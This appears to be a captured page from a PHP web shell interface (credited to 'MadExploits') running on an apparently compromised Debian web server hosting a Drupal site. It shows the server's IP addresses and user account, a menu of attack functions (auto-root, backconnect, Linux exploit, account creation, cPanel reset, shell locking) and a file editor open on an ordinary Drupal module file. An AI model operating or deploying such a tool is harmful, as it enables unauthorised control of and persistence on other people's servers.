Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.133.127.131
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
entity /
modules /
[ HOME SHELL ]
Name
Size
Permission
Action
book.info.inc
890
B
-rw-r--r--
callbacks.inc
33.06
KB
-rw-r--r--
comment.info.inc
6.26
KB
-rw-r--r--
field.info.inc
7.16
KB
-rw-r--r--
locale.info.inc
1.43
KB
-rw-r--r--
node.info.inc
5.82
KB
-rw-r--r--
poll.info.inc
1.65
KB
-rw-r--r--
statistics.info.inc
1.32
KB
-rw-r--r--
system.info.inc
4.49
KB
-rw-r--r--
taxonomy.info.inc
4.27
KB
-rw-r--r--
user.info.inc
3.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : statistics.info.inc
<?php /** * @file * Provides info about statistics. */ /** * Implements hook_entity_property_info_alter() on top of statistics module. * * @see entity_entity_property_info_alter() */ function entity_metadata_statistics_entity_property_info_alter(&$info) { $properties = &$info['node']['properties']; $properties['views'] = array( 'label' => t("Number of views"), 'description' => t("The number of visitors who have read the node."), 'type' => 'integer', 'getter callback' => 'entity_metadata_statistics_node_get_properties', 'computed' => TRUE, 'access callback' => 'entity_metadata_statistics_properties_access', ); $properties['day_views'] = array( 'label' => t("Views today"), 'description' => t("The number of visitors who have read the node today."), 'type' => 'integer', 'getter callback' => 'entity_metadata_statistics_node_get_properties', 'computed' => TRUE, 'access callback' => 'entity_metadata_statistics_properties_access', ); $properties['last_view'] = array( 'label' => t("Last view"), 'description' => t("The date on which a visitor last read the node."), 'type' => 'date', 'getter callback' => 'entity_metadata_statistics_node_get_properties', 'computed' => TRUE, 'access callback' => 'entity_metadata_statistics_properties_access', ); }
Close